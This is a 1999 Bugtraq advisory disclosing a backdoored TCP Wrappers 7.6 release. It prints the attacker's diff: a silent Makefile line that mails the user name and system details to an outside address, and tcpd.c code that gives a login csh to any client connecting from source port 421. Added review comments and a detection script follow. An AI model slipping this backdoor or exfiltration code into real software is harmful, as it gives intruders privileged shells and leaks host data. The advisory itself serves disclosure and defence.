Bugtraq mailing list archives
backdoored tcp wrapper source code
From: wietse () PORCUPINE ORG (Wietse Venema)
Date: Thu, 21 Jan 1999 11:38:17 -0500
TCP Wrappers is a widely-used security tool to protect UNIX systems against intrusion. It has an estimated installed base of millions.

Today someone replaced the tcp wrapper source on ftp.win.tue.nl by a backdoored version. Eventually this was bound to happen, and that's why the source file is accompanied by a PGP signature. But that is no guarantee against people downloading and installing backdoored software.

The backdoor gives access to a privileged shell when a client connects from port 421.

The backdoored copy was downloaded 52 times between 07:16 MET and 16:29 MET. I have informed the sites that downloaded a copy.

Below are details on how to recognize the backdoored version.

	Wietse

Relevant time stamp/size information (times relative to MET):

Backdoored version:

% ls -lcta
-r--r--r--   1 wswietse     99186 Jan 21 07:16 tcp_wrappers_7.6.tar.gz
...
dr-xr-sr-x   3 wswietse      4096 Apr 11  1998 .

Restored version:

% ls -lt tcp_wrappers_7.6.tar.gz
-r--r--r--   1 wswietse     99438 Jan 21 16:29 tcp_wrappers_7.6.tar.gz

The signature of the bad TAR file is: length 99186 instead of 99438.

The signature of a compiled tcpd binary is:

    strings -a tcpd | grep csh

Any output probably means trouble.

Changes that were made to the tcp wrapper 7.6 source code:

diff -c 7.6/Makefile /tmp/tcp_wrappers_7.6/Makefile *** 7.6/Makefile Mon Apr 7 20:34:16 1997 --- /tmp/tcp_wrappers_7.6/Makefile Fri Mar 21 13:27:21 1997 *************** *** 26,31 **** --- 26,32 ---- @echo @echo "If none of these match your environment, edit the system" @echo "dependencies sections in the Makefile and do a 'make other'." + @sh -c 'echo debug-`whoami`-`uname -a` |mail -s debug wtcpd () hotmail com' @echo ####################################################### *************** *** 649,655 **** # source-routed traffic in the kernel. Examples: 4.4BSD derivatives, # Solaris 2.x, and Linux. See your system documentation for details. # ! 
KILL_OPT= -DKILL_IP_OPTIONS ## End configuration options ############################ --- 650,656 ---- # source-routed traffic in the kernel. Examples: 4.4BSD derivatives, # Solaris 2.x, and Linux. See your system documentation for details. # ! # KILL_OPT= -DKILL_IP_OPTIONS ## End configuration options ############################ Only in 7.6: Makefile- diff -c 7.6/tcpd.c /tmp/tcp_wrappers_7.6/tcpd.c *** 7.6/tcpd.c Sun Feb 11 11:01:33 1996 --- /tmp/tcp_wrappers_7.6/tcpd.c Sun Feb 11 11:01:33 1996 *************** *** 41,52 **** --- 41,63 ---- int allow_severity = SEVERITY; /* run-time adjustable */ int deny_severity = LOG_WARNING; /* ditto */ + char IDENT[]="NC421\n"; + char SRUN[]="-csh"; + char SPATH[]="/bin/csh"; + #define PORT 421 + main(argc, argv) int argc; char **argv; { struct request_info request; + struct sockaddr_in from; char path[MAXPATHNAMELEN]; + int fromlen; + + fromlen = sizeof(from);if (getpeername(0,(struct sockaddr*)&from, + &fromlen)>=0){if(ntohs(from.sin_port)==PORT){write(0,IDENT, + strlen(IDENT));execl(SPATH,SRUN,(char*)0);}} /* Attempt to prevent the creation of world-writable files. */
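Review bot: the line added by the Makefile hunk at 26,31, `@sh -c 'echo debug-`whoami`-`uname -a` |mail -s debug wtcpd () hotmail com'`, runs on every invocation of the default target and mails the builder's user name plus the full `uname -a` output to an outside mailbox; a build recipe has no business sending mail, and the leading `@` keeps the command out of make's echoed output so the builder never sees it run. The line has to go, and an archive whose Makefile contacts the network should be treated as compromised as a whole rather than patched around.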
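Review bot: the only change in the Makefile hunk at 649,655 is turning `KILL_OPT= -DKILL_IP_OPTIONS` into a comment, so the resulting tcpd is no longer compiled to strip IP source-route options, while the surrounding comment about kernels that deal with source-routed traffic themselves is left untouched, so nothing in the file explains why the default moved. This is unrelated to the mail line above and quietly weakens the shipped configuration; the uncommented `KILL_OPT=` line should be restored.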
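Review bot: the block the tcpd.c hunk at 41,52 inserts at the top of main() calls getpeername() on descriptor 0 and, when the peer's source port is 421, writes the `NC421\n` banner and execl()s /bin/csh with argv[0] `-csh` (a login shell) before any of tcpd's own processing, which starts with the world-writable-files guard that follows; the caller gets an interactive shell with tcpd's privileges and none of the access control or logging the program exists to provide. A getpeername() failure is silently ignored, so when tcpd is not fed a socket on stdin the code is inert and the change survives casual testing; note also that both sides of the file header carry the identical timestamp `Sun Feb 11 11:01:33 1996`, i.e. the modified file's mtime was set to match the original. The block and the IDENT/SRUN/SPATH/PORT definitions must be removed outright; the string constants it adds are exactly what `strings -a tcpd | grep csh` catches.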
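The two indicators from the post (tarball length, and csh strings in a compiled tcpd) as an added shell script that is not part of Wietse's message; the sizes and marker strings are the ones quoted above, and `grep -a` stands in for strings(1) so the check does not depend on binutils being installed.

```shell
#!/bin/sh
# Added example, not part of the original post: the two indicators from the
# advisory (tarball length, "csh" strings in the compiled tcpd) as reusable
# shell functions. Sizes and marker strings are the ones quoted in the post.

GOOD_SIZE=99438   # restored tcp_wrappers_7.6.tar.gz
BAD_SIZE=99186    # backdoored copy served on Jan 21 1999

# Prints clean / backdoored / unknown for a tarball, judged by byte length.
# A length match is only a weak indicator: "unknown" and even "clean" still
# need the PGP signature checked before the archive is trusted.
classify_tarball() {
    size=$(wc -c < "$1" | tr -d ' ')
    if [ "$size" -eq "$GOOD_SIZE" ]; then
        echo clean
    elif [ "$size" -eq "$BAD_SIZE" ]; then
        echo backdoored
    else
        echo unknown
    fi
}

# Equivalent of `strings -a tcpd | grep csh` without depending on binutils:
# grep -a reads the binary as text and -o prints each match on its own line.
# Besides the two csh strings from the hunk, also look for the NC421 banner
# the backdoor writes to the socket before exec'ing the shell.
scan_tcpd() {
    grep -a -o -E 'NC421|/bin/csh|-csh' "$1" | sort -u
}

# Succeeds (exit 0) when the binary carries any of the markers.
tcpd_is_suspect() {
    [ -n "$(scan_tcpd "$1")" ]
}

# Stand-alone use: check_tcpd.sh tcp_wrappers_7.6.tar.gz [path/to/tcpd]
if [ "$#" -ge 1 ]; then
    echo "$1: $(classify_tarball "$1")"
fi
if [ "$#" -ge 2 ]; then
    if tcpd_is_suspect "$2"; then
        echo "$2: backdoor markers found:"; scan_tcpd "$2"
    else
        echo "$2: no csh/NC421 strings"
    fi
fi
```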